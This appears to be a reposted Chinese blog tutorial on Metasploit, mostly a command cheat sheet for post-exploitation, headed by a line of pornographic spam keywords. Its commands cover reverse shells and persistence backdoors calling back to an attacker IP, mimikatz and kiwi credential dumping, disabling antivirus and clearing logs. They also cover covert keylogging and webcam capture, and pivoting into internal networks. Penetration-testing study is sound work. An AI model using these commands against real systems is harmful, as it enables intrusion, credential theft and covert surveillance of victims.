国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

metasploit(MSF)滲透超細(xì)解說 -- 小黑滲透工具

這篇具有很好參考價值的文章主要介紹了metasploit(MSF)滲透超細(xì)解說 -- 小黑滲透工具。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報違法"按鈕提交疑問。

metasploit Framework(msf)里帶數(shù)千個已知的軟件漏洞,并保持持續(xù)更新,Metasploit可以用來信息收集、漏洞探測、漏洞利用等滲透測試的全流程,采用Ruby語言編寫。黑掉整個宇宙的稱號!??!

初心:? ? 記錄msfconsole的滲透測試流程,以及每個流程點(diǎn)常用到的一些命令,其中還有一些不足的地方大家可以指出來,我會在本博客中添加補(bǔ)充,也會將大家的名字備注在補(bǔ)充的章節(jié)內(nèi)?。? 一起加油? ^-^

本章出后后續(xù)會出實(shí)戰(zhàn)測試,也會將win和linux常用命令做一期更新。

目錄?

kali自帶的msf,升級更新

基本滲透使用流程

攻擊載荷參數(shù)設(shè)置

meterpreter【獲取權(quán)限后的后滲透工具】

meterperter特點(diǎn)【后滲透模塊】

后滲透命令【win主機(jī)系統(tǒng)信息命令】

POST? 后滲透模塊【獲取目標(biāo)主機(jī)控制權(quán)后的滲透攻擊】

后滲透流程【流程常用命令】

使用mimikatx抓取密碼

提權(quán)【win提權(quán)到system】

KiWi模塊使用(msf中集成mimikatz模塊被kiwi取代)

后滲透模塊【主機(jī)安裝應(yīng)用參數(shù)配置】

后滲透模塊【后臺操作設(shè)置】

?建立持續(xù)性后門

MSF搭建socks代理

路由配置

路由參數(shù)說明

?portfwd端口轉(zhuǎn)發(fā)win系統(tǒng)

powershell收集域內(nèi)信息

備注:meterpreter模塊加載命令


kali自帶的msf,升級更新

apt update ? ? ? ? ? ? ? ? ? ? ? ? ? ?更新安裝包信息,只檢查不更新

apt ?upgrade ? ? ? ? ? ? ? ? ? ? ? ? 更新已安裝的軟件包,不刪除舊包

apt ?full-upgrade ? ? ? ? ? ? ? ? ? 升級包,刪除舊包

長時間沒有用kali,會導(dǎo)致數(shù)字簽名會過期,從而導(dǎo)致無法更新源。

wget -q -O - https://archive.kali.org/archive-key.asc | apt-key?add? ? 解決

kiwi模塊,滲透工具集合,安全

?

基本滲透使用流程

msfconsole ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 進(jìn)入框架 search ?ms17_010 ? ?

? ? ? ? ? ? ? ? ? ?

search查找相關(guān)的漏洞攻擊模塊 (Auxiliary為輔助探測是否有該漏洞模塊,exploit為漏洞利用模塊)

use ? xxx/xxx/xxx ? ? ? ? ? ? ? ? ? ? ? use選擇攻擊模塊

info ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 使用info查看漏洞類型的信息(針對的系統(tǒng)版本、語言版本)

show payloads ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看此漏洞可以利用的payload

set payload ? xxx/xxx ? ? ? ? ? ? ? ? ? ?設(shè)置攻擊載荷

show options ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看模塊需要配置的參數(shù)

show targets ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看可攻擊的系統(tǒng)平臺(默認(rèn)會自動判斷目標(biāo)操作系統(tǒng)版本和語言)

set ? xxxx ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 設(shè)置參數(shù)

exploit ? ?/ ?run ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?保存/攻擊(如果是探測的話顯示 ?+ 號代表存在該漏洞) 后滲透階段

攻擊載荷參數(shù)設(shè)置

set RHOST 192.168.100.158 ? #設(shè)置RHOST,也就是要攻擊主機(jī)的ip

set LHOST 192.168.100.132 ? #設(shè)置LHOST,也就是我們主機(jī)的ip,用于接收從目標(biāo)機(jī)彈回來的shell

set lport 6666 ? ? ? ? ? ? ?#設(shè)置lport,也就是我們主機(jī)的端口,反彈shell到這個端口;如果我們這里不設(shè)置lport的話,默認(rèn)是4444端口監(jiān)聽;

meterpreter【獲取權(quán)限后的后滲透工具】

meterpreter屬于stage payload,在Metasploit Framework中,Meterpreter屬于一種在運(yùn)行過程中可通過網(wǎng)絡(luò)進(jìn)行功能擴(kuò)展型payload。這種工具基于“內(nèi)存DLL注入”理念實(shí)現(xiàn)的,它能夠通過創(chuàng)建一個新進(jìn)程并調(diào)用注入的DLL來讓目標(biāo)系統(tǒng)運(yùn)行注入的DLL文件。

工作流程:目標(biāo)先要執(zhí)行初始的溢出的漏洞會話連接,可能是bind正向連接,或者反彈revers連接。反彈連接的時候加載dll鏈接文件,同時后臺悄悄處理dll文件。 然后通過meterpreter核心代碼初始化,通過socket套接字建立一個TLS/1.0加密隧道并發(fā)送GET請求給Metasploit服務(wù)端。Metasploit服務(wù)端收到GET請求后配置相應(yīng)的客戶端。 最后,meterpreter加載擴(kuò)展,所有的擴(kuò)展被加載都通過TLS/1.0進(jìn)行數(shù)據(jù)傳輸。

meterperter特點(diǎn)【后滲透模塊】

meterpreter完全駐留在內(nèi)存,沒有寫入磁盤

Meterpreter注入的時候不會產(chǎn)生新的進(jìn)程,并可以很容易的移植到其它正在運(yùn)行的進(jìn)程。 默認(rèn)情況下,mertepreter的通信是加密的,所以很安全

? ? 擴(kuò)展性,許多新的特征模塊可以被加載。 ? ? ? ? ? ?

? ? ? ? ? ? ? ? ? ?設(shè)置payload時,可以設(shè)置為反向鏈接,可以獲得meterpreter> ? ? ? ? ? ?

? ? ? ? ? ? ? ? ? ?就可以接著后滲透流程

?? ? ? ? ? 【直接輸入?,可以查看meterpreter中的參數(shù)說明】

background ? ? 【可以把meterpreter掛載到后臺運(yùn)行】

sessions -l ? ? ? 【查看獲得的meterpreter_shell會話列表】

后滲透命令【win主機(jī)系統(tǒng)信息命令】

sysinfo ? ? ? ? ? ? ? ? ? ? 查看目標(biāo)主機(jī)系統(tǒng)信息

run scraper ? ? ? ? ? ? ? 查看目標(biāo)主機(jī)詳細(xì)信息

run hashdump ? ? ? ? ? 導(dǎo)出密碼的哈希

load kiwi ? ? ? ? ? ? ? ? ?加載mimikatz

ps ? ? ? ? ? ? ? ? ? ? ? ? ? 查看目標(biāo)主機(jī)進(jìn)程信息

pwd ? ? ? ? ? ? ? ? ? ? ? ? 查看目標(biāo)當(dāng)前目錄(windows)

getlwd ? ? ? ? ? ? ? ? ? ? 查看目錄當(dāng)前目錄(linux) search -f *.jsp -d e:\ ? ?搜索e盤中所有以.jsp為后綴的文件

download ?e:\test.txt /root ? ? ? ?將目標(biāo)主機(jī)的e:\test.txt文件下載到/root目錄下

upload /root/test.txt ?d:\test ? ? ?將/root/test.txt 上傳到目錄機(jī)的d:\test\目錄

getpid? ? ? ? ? ? ? ? ? ? ? ? ? 查看Meterpreter shell的進(jìn)程PID

migrate 1384? ? ? ? ? ? ? ? 將當(dāng)前Merterpreter shell的進(jìn)程遷移到PID為1384的進(jìn)程上

idletime? ? ? ? ? ? ? ? ? ? ? ? 查看主機(jī)運(yùn)行時間

getuid? ? ? ? ? ? ? ? ? ? ? ? ? 查看獲取的當(dāng)前權(quán)限

getsystem? ? ? ? ? ? ? ? ? ?提權(quán),獲得的當(dāng)前用戶是administrator才能成功

run killav? ? ? ? ? ? ? ? ? ? 關(guān)閉殺毒軟件

screenshot? ? ? ? ? ? ? ? ?截圖

webcam_list? ? ? ? ? ? ? 查看目標(biāo)主機(jī)的攝像頭

webcam_snap ? ? ? ? ?拍照

webcam_stream ? ? ? 開視頻

execute? ? ? ? ? ? ? ? ? ? 參數(shù) -f 可執(zhí)行文件 ? ? ? ? ? ? 執(zhí)行可執(zhí)行程序

run getgui -u testl -p ABC123 ? ? ? ? ? ? ? ? ? 創(chuàng)建testl用戶,密碼為ABC123

run getgui -e ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?開啟遠(yuǎn)程桌面

keyscan_start ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?開啟鍵盤記錄功能

keyscan_dump ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 顯示捕捉到的鍵盤記錄信息

keyscan_stop ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 停止鍵盤記錄功能

uictl disable ?keyboard ? ? ? ? ? ? ? ? ? ? ? ? ? ?禁止目標(biāo)使用鍵盤

uictl enable ?keyboard ? ? ? ? ? ? ? ? ? ? ? ? ? ? 允許目標(biāo)使用鍵盤

uictl disable ?mouse ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?禁止目標(biāo)使用鼠標(biāo)

uictl enable ? mouse ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 允許目標(biāo)使用鼠標(biāo)

load ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用擴(kuò)展庫

run ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用擴(kuò)展庫

POST? 后滲透模塊【獲取目標(biāo)主機(jī)控制權(quán)后的滲透攻擊】

manage

run ? post/windows/manage/migrate? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 自動進(jìn)程遷移?

run ? post/windows/manage/killav? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 關(guān)閉殺毒軟件

run? ?post/windows/manage/enable_rdp? ? ? ? ? ? ? ? ? ? ? ? ? ? 開啟遠(yuǎn)程桌面服務(wù)

run ? post/windows/manage/autoroute? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看路由信息

run? post/windows/manage/enable_rdp? USERNAME=SS2 PASSWORD=123456? ? ?

添加遠(yuǎn)程桌面用戶

run? ?post/windows/manage/enable_rdp FORWARD=true? LPORT=6662?

將3389端口轉(zhuǎn)發(fā)到6662

gather

run ? post/windows/gather/enum_logged_on_users? ? ? ? ? ?列舉當(dāng)前登錄的用戶

run ?post/windows/gather/enum_applications? ? ? ? ? ? ? ? ? ? ?列舉應(yīng)用程序

run ?post/windows/gather/credentials/windows_autologin ? ?抓取自動登錄的用戶名和密碼 run ?post/windows/gather/smart_hashdump? ? ? ? ? ? ? ? ? ? ? ? ?dump出所有用戶的hash

run? post/windows/gather/enum_domain? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看域控

run? post/windows/gather/enum_patches? ? ? ? ? ? ? ? ? ? ? ? ? ? ?補(bǔ)丁信息【獲取是否有直接可以利用的msf補(bǔ)丁序號】

run? post/windows/gather/checkvm? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看目標(biāo)主機(jī)是否運(yùn)行在虛擬機(jī)上

? ?后滲透流程【流程常用命令】

sysinfo? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看目標(biāo)主機(jī)的信息

run? ?post/windows/gather/checkvm? ? ? ? ? ? ? ?查看主機(jī)是否運(yùn)行在虛擬機(jī)上

run killav? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?關(guān)閉掉目標(biāo)主機(jī)殺毒軟件

run scraper? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?獲取目標(biāo)主機(jī)的詳細(xì)信息 訪問文件系統(tǒng)

pwd? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看當(dāng)前目錄

cat? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?讀取文件內(nèi)容

rm? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?刪除文件

edit? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?使用vim編輯文件

mkdir? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 新建目錄

rmdir? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?刪除目錄

download ? file (文件)? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?幫助從目標(biāo)系統(tǒng)中下載文件

duload ?file(文件)? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 向目標(biāo)系統(tǒng)上傳文件

getuid? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?命令可以獲取當(dāng)前用戶的信息

getsystem? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?自動提權(quán)為系統(tǒng)權(quán)限

使用mimikatx抓取密碼

run windows/gather/credentials/windows_autologin ? ? 抓取自動登錄的用戶名和密碼

run ?hashdump ? ? ? ? ? ? ?導(dǎo)出密碼哈希 導(dǎo)出格式: ? ?用戶名:SID:LM哈希:NTLM哈希:::

run windows/gather/smart_hashdump? ? ? ? ? ? ? ? ?命令的使用需要系統(tǒng)權(quán)限

前提:執(zhí)行mimikatz必須System權(quán)限,并且執(zhí)行時,要根據(jù)當(dāng)前的系統(tǒng)位數(shù)進(jìn)行選擇

首先查看當(dāng)前會話的權(quán)限(getuid),然后看系統(tǒng)位數(shù)(sysinfo),(upload )上傳文件絕對路徑,execute -i -f mimikatz.exe(執(zhí)行)? ?【注:mimikatz必須使用system權(quán)限】

抓取密碼: privilege::debug

? ? ? ? ? ? ? ? ? ?sekurlsa::logonpasswords

提權(quán)【win提權(quán)到system】

一、當(dāng)前權(quán)限是administrator用戶

二、利用其它手段先提權(quán)到admininistrator用戶,然后administrator用戶可以直接在meterpreter_shell使用命令getsystem提權(quán)到system權(quán)限。

? ? ? ?

getuid? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看當(dāng)前會話用戶身份

getsystem? ? ? ? ? ? ? ? ? ? ? ? ? ?嘗試自動提權(quán)

KiWi模塊使用(msf中集成mimikatz模塊被kiwi取代)

msf中集成的mimikatz模塊已經(jīng)被kiwi取代 ? ? ? ? ? ?

? ? ? ? ?前提:提權(quán)到system權(quán)限,kiwi默認(rèn)加載是32位。 如果目標(biāo)主機(jī)是64位系統(tǒng),澤必須先看系統(tǒng)進(jìn)程列表,然后將meterpreter進(jìn)程遷移到一個64位程序的進(jìn)程中,才能加載kiwi并查看系統(tǒng)明文。? ? ? ? ?

sysinfo? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看系統(tǒng)的?

ps? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看是否有64位進(jìn)程

migrate ?PID? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?進(jìn)程遷移到Pid上

kiwi_cmd ? sekurlsa::logonpasswords? ? ? 可以使用mimikatz的全部功能

ps? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?查看進(jìn)程

load ?kiwi? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 加載kiwi模塊

help ?kiwi? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 查看kiwi模塊

creds_all? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列舉所有1憑據(jù),可以列舉系統(tǒng)中的明文密碼

creds_kerberos? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列舉所有kerberos憑據(jù)

creds_msv? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 列舉所有msv憑據(jù)

creds_ssp? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 列舉所有ssp憑據(jù)

creds_tspkg? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列舉所有tspkg憑據(jù)

creds_wdigest? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列舉所有wdigest憑據(jù)

dcsync? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?通過dcsync檢索用戶賬戶信息

dcsync_ntlm? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?通過dcsync檢索用戶賬戶NTM散列、SID和RID

golden_ticket_create ? ? ? ? ? ? ? ? ? ? 創(chuàng)建黃金票據(jù)

kerberos_ticket_list ? ? ? ? ? ? ? ? ? ? ? 列舉kerberos票據(jù)

kerberos_ticket_purge ? ? ? ? ? ? ? ? ?清除kerberos票據(jù)

kerberos_ticket_use? ? ? ? ? ? ? ? ? ? ? 使用kerberos票據(jù)

kiwi_cmd? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?執(zhí)行mimikatz的命令,后面接mimikatz.exe命令 lsa_dump_sam? ? ? ? ? ? ? ? ? ? ? ? ? ? ? dump出lsa的SAM

lsa_dump_secrets? ? ? ? ? ? ? ? ? ? ? ? ? dump出lsa的密文

password_change? ? ? ? ? ? ? ? ? ? ? ? ? 修改密碼

wifi_list? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 列出當(dāng)前用戶的wifi配置文件

wifi_list_shared? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?列出共享wifi配置文件/編碼

后滲透模塊【主機(jī)安裝應(yīng)用參數(shù)配置】

run post/windows/gathtier/enum_applications? ? ? ? ? ? ? ? ? ? ? ? ? 查看目標(biāo)主機(jī)安裝哪些應(yīng)用

execute ? + [參數(shù)]

-f ? 偽造的線程令牌運(yùn)指定可執(zhí)行文件

-H ?創(chuàng)建一個隱藏進(jìn)程

-a ? 傳遞給命令的參數(shù)

-i ? ?跟進(jìn)程進(jìn)行交互

-m ? 從內(nèi)存中執(zhí)行

-t ? ?使用當(dāng)前行進(jìn)程

-s ? 在給定會話執(zhí)行進(jìn)程

screenshot? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?截圖目標(biāo)主機(jī)屏幕

run ?post/windows/gather/enum_logged_on_users ? ? ? ? 查看目標(biāo)主機(jī)有用戶

創(chuàng)建賬戶:

方式一: run ?getgui ?-u ?用戶名 -p ?密碼

方式二: run post/windows/manage/enable_rdp ?username=xxx password=xxxx

啟用遠(yuǎn)程桌面:

idletime? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?檢查遠(yuǎn)程用戶的空閑時長

run ?post/windows/manage/enable_rdp? ? ? ? ? ? ? ? ? ? ? ? ? 開啟遠(yuǎn)程桌面

run ?post/windows/manage/enable_rdp? FORWARD=true LPORT=6662? ? ?將3389端口轉(zhuǎn)發(fā)到6662端口

后滲透模塊【后臺操作設(shè)置】

?鍵盤記錄:

keyscan_start? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?開啟鍵盤記錄功能

keyscan_dump? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?顯示捕捉到的鍵盤記錄信息

keyscan_stop? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?停止鍵盤記錄功能

禁止目標(biāo)主機(jī)使用鍵盤鼠標(biāo):

uictl ?disable(enable) ?keyboard? ? ? ? ? ?禁止允許目標(biāo)使用鍵盤

uictl ? disable(enable) ?mouse? ? ? ? ?禁止目標(biāo)使用鼠標(biāo)

目標(biāo)主機(jī)攝像頭拍照:

webcam_list? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?獲取目標(biāo)系統(tǒng)的攝像頭列表

webcam_snap? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?從指定的攝像頭,拍攝照片

webcam_stream? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 從指定的攝像頭,開啟視頻

load/use? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 加載模塊

load ?-l? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 列出所有可用的擴(kuò)展

load -help? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? 幫助;

說明 生成后門木馬,然后放到windows的啟動目錄中: C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

服務(wù)啟動: ? run ?exploit/windows/local/peristence lhost=192.168.100.132 ?lport=xxx

進(jìn)程連接192.168.100.132:8888 ?【缺點(diǎn)容易被殺毒】

netstat ?-ano : findstr “8888”

?建立持續(xù)性后門

meterpreter模塊基于內(nèi)存DLL建立的連接,需要在目標(biāo)系統(tǒng)內(nèi)部留下一個持續(xù)性的后門。

兩種方式:

? ? ? ? 一種通過啟動項(xiàng)啟動(persistence),

? ? ? ? 第二種服務(wù)啟動(metsvc)

啟動項(xiàng):

首先要生成一個后門木馬,然后放入windows的啟動目錄中,只要開機(jī)就可以啟動連接對應(yīng)端口。

C:\Users\$username$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

服務(wù)啟動:

run exploit/windows/local/persistence lhost=192.168.100.132 lport=8888 ? ? ? ?

#會自動連接192.168.100.132的8888端口,缺點(diǎn)是容易被殺毒軟件查殺

MSF搭建socks代理

msf中有三個代理模塊 socks4a ?、 socks5 ?、 socks_unc socks5可以設(shè)置用戶名和密碼,但有時候msf不會監(jiān)聽端口,可能導(dǎo)致代理失敗 use ?auxiliary/server/socks ? ? 使用該模塊 這里socks模塊只是將代理設(shè)置為監(jiān)聽(默認(rèn)為1080),即通過proxychains的流量都轉(zhuǎn)給本地的1080端口,又因?yàn)檫@是MSF起的監(jiān)聽端口,所以通過代理走的流程也都能達(dá)到內(nèi)網(wǎng)。

代理設(shè)置:

msf中將模塊改為 ? ?use ?auxiliary/server/socks_proxy

show options ? ? ? ? ? ? ? ?查看模塊詳情 設(shè)置sock監(jiān)聽的接口IP和端口 ? ? ? ? ?

set ?SRVHOST ?ip(127.0.0.1) ?&& set ?SRVPORT ? 端口

socks4a代理設(shè)置:

use ? auxiliary/server/socks4a

set ?SRVHOST ? ? 0.0.0.0

set ?SRVPORT ? ? 1080 run

socks5代理設(shè)置:

use ? auxiliary/server/socks5

set ?SRVHOST ? ? 0.0.0.0

set ?SRVPORT ? ? 1080

set ? USERNAME ? root

set ? PASSWORD Password@

run

連接代理:

編輯本地proxychains程序配置文件 vim ?/etc/proxychains.conf 瀏覽器也需要設(shè)置代理,直接通過瀏覽器就可以訪問內(nèi)網(wǎng),找到ProxyList

[ProxyList]

中添加socks5 0.0.0.0 1080? root? password? ? 【1080為監(jiān)聽端口】

用nmap測試程序時,必須使用proxychains4?nma?-sT -Pn ?xxxx ?才可以

路由配置

?【使用代理前添加路由】

先添加路由讓MSF能達(dá)到目標(biāo)機(jī)器內(nèi)網(wǎng)。

route add 209.98.32.33 mask 255.255.255.224 ?202.96.123.3 ?metric 5 ? ?執(zhí)行命令添加路由

route print ? ? ? ? ? ?打印路由的Destination ? ? ? ?

route delete ?209.98.32.33 ? 刪除路由

route change 209.98.32.33 netmask 255.255.255.224 ?202.96.123.3 ?metric 5【修改209.98.32.33網(wǎng)關(guān)修改為202.96.132.3】

路由轉(zhuǎn)發(fā):

方式一:

route ? ? ? ? ? ? ? ? ? ? ? ? 查看網(wǎng)段信息

background ? ? ? ? ? ? ? 將目前進(jìn)程掛到后臺,回到msf

route add 172.16.10..0 255.255.255.0 ?1 ? ?添加路由(1是掛起session編號)

route ?print ? ? ? ? ? ? ? ?

查看路由信息

方式二: use ? post/multi/manage/autoroute

set ? session 1 exploit ? ? ? 【直接加載這個模塊,調(diào)用session】

缺點(diǎn): 通過這種方式做代理轉(zhuǎn)發(fā),只能是msf使用,其它的應(yīng)用無法使用,其它應(yīng)用使用需要增加sock代理。

路由參數(shù)說明

?add? ? ? ? ? ? ? ? ? ? ?增加路由記錄 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

?del? ? ? ? ? ? ? ? ? ? ? 刪除路由記錄

target? ? ? ? ? ? ? ? ? ?目的網(wǎng)絡(luò)或目的主機(jī) ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

gw? ? ? ? ? ? ? ? ? ? ? ?設(shè)置默認(rèn)網(wǎng)關(guān)

mss? ? ? ? ? ? ? ? ? ? ?設(shè)置TCP的最大區(qū)塊長度,單位MB ? ? ? ? ? ?

windows? ? ? ? ? ? ? 指定通過路由表的TCP連接的TCP窗口大小

dev? ? ? ? ? ? ? ? ? ? ? 路由記錄所表示的網(wǎng)絡(luò)接口

netmask? ? ? ? ? ? ? 設(shè)置掩碼長度 ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

-A? ? ? ? ? ? ? ? ? ? ? ? 設(shè)置地址類型 ? ? ?

-c? ? ? ? ? ? ? ? ? ? ? ? ?打印Linux內(nèi)核的路由緩存 ?

-v? ? ? ? ? ? ? ? ? ? ? ? ? 顯示詳細(xì)信息 ? ? ?

?-n? ? ? ? ? ? ? ? ? ? ? ?不執(zhí)行DNS反向查找,直接顯示數(shù)字形式的IP地址

-e? ? ? ? ? ? ? ? ? ? ? ? netstart格式顯示路由表 ? ? ? ?

?-net? ? ? ? ? ? ? ? ? ? 到一個網(wǎng)絡(luò)的路由表

-host? ? ? ? ? ? ? ? ? ?到一個主機(jī)的路由表

?portfwd端口轉(zhuǎn)發(fā)win系統(tǒng)

portfwd add -l 9999 -r 192.168.100.158 -p 3389 ? ? ?? ??? ?

#將192.168.11.13的3389端口轉(zhuǎn)發(fā)到本地的9999端口上,這里的192.168.100.158是獲取權(quán)

限的主機(jī)的ip地址

portfwd ?add -l ?9999 -r 192.168.100.158 -p 3389 ? ?

-l ? ? ? ?本地監(jiān)聽端口

-p ? ? ? 目標(biāo)服務(wù)器端口

add ? ? 添加一個連接

將目標(biāo)端口轉(zhuǎn)發(fā)到本地監(jiān)聽端口,用于接收目標(biāo)主機(jī)的端口反彈

rdesktop ? ? ? ?127.0.0.1:9999 ? ? ?訪問本地9999端口即可連接到目標(biāo)主機(jī)的3389端口

clearev ? ? ? ? ? ? ? ? ? ? ? #清除日志

powershell收集域內(nèi)信息

load ?powershell? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?加載powershell功能

powershell_import ?/root/PowerView.ps1 ? ? ? ? ? ? ? 導(dǎo)入powershell腳本,提前將該powershell腳本放到指定目標(biāo)

powershell_execute ?Get-NetDomain? ? ? ? ? ? ? ? ? ? 該模塊獲取域信息

powershell_execute Invoke-UserHunter? ? ? ? ? ? ? ?該功能模塊用于定位域管理員登錄的主機(jī) powershell_execute Get-NetForest? ? ? ? ? ? ? ? ? ? ? 該模塊用于定位域信息 powershell_execute Invoke-EnumerateLocalAdmin? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

枚舉域中所有計(jì)算機(jī)上本地管理員組的成員

備注:meterpreter模塊加載命令

meterpreter模塊命令不齊全,可以執(zhí)行load?lstdapi加載補(bǔ)全命令

有時候后滲透收到的不是meterperpreter類型的session,可以用sessions -u id 來升級session。執(zhí)行該命令,默認(rèn)調(diào)用的是? /post/multi/manage/shell_to_meterpreter.

sessions -u? ?id? ? 中的 id 為載荷id文章來源地址http://www.zghlxwxcb.cn/news/detail-808069.html

到了這里,關(guān)于metasploit(MSF)滲透超細(xì)解說 -- 小黑滲透工具的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Metasploit——滲透攻擊模塊(Exploit)

    Metasploit——滲透攻擊模塊(Exploit)

    Metasploit常用命令、技術(shù)功能模塊 ? Metasploit——輔助模塊(Auxiliary)? 目錄 1.Exploit模塊 2.生成Payload? 3.Meterpreter常用命令 4.弱點(diǎn)掃描 Active exploits主動:攻擊者主動向目標(biāo)發(fā)起漏洞利用代碼,觸發(fā)漏洞 ??????????? 目標(biāo)開放一個端口(服務(wù)),允許外界計(jì)算機(jī)連接這個端口(訪問

    2024年02月11日
    瀏覽(53)
  • Kali最強(qiáng)滲透工具- metasploit

    Kali最強(qiáng)滲透工具- metasploit

    數(shù)據(jù)來源 ??本文僅用于信息安全學(xué)習(xí),請遵守相關(guān)法律法規(guī),嚴(yán)禁用于非法途徑。若觀眾因此作出任何危害網(wǎng)絡(luò)安全的行為,后果自負(fù),與本人無關(guān)。? 得到ip地址我們能干嘛? ????????首先進(jìn)行端口掃描 為什么要進(jìn)行端口掃描? ????????端口掃描的作用就是發(fā)現(xiàn)目

    2023年04月16日
    瀏覽(48)
  • Kali最強(qiáng)滲透工具-metasploit

    Kali最強(qiáng)滲透工具-metasploit

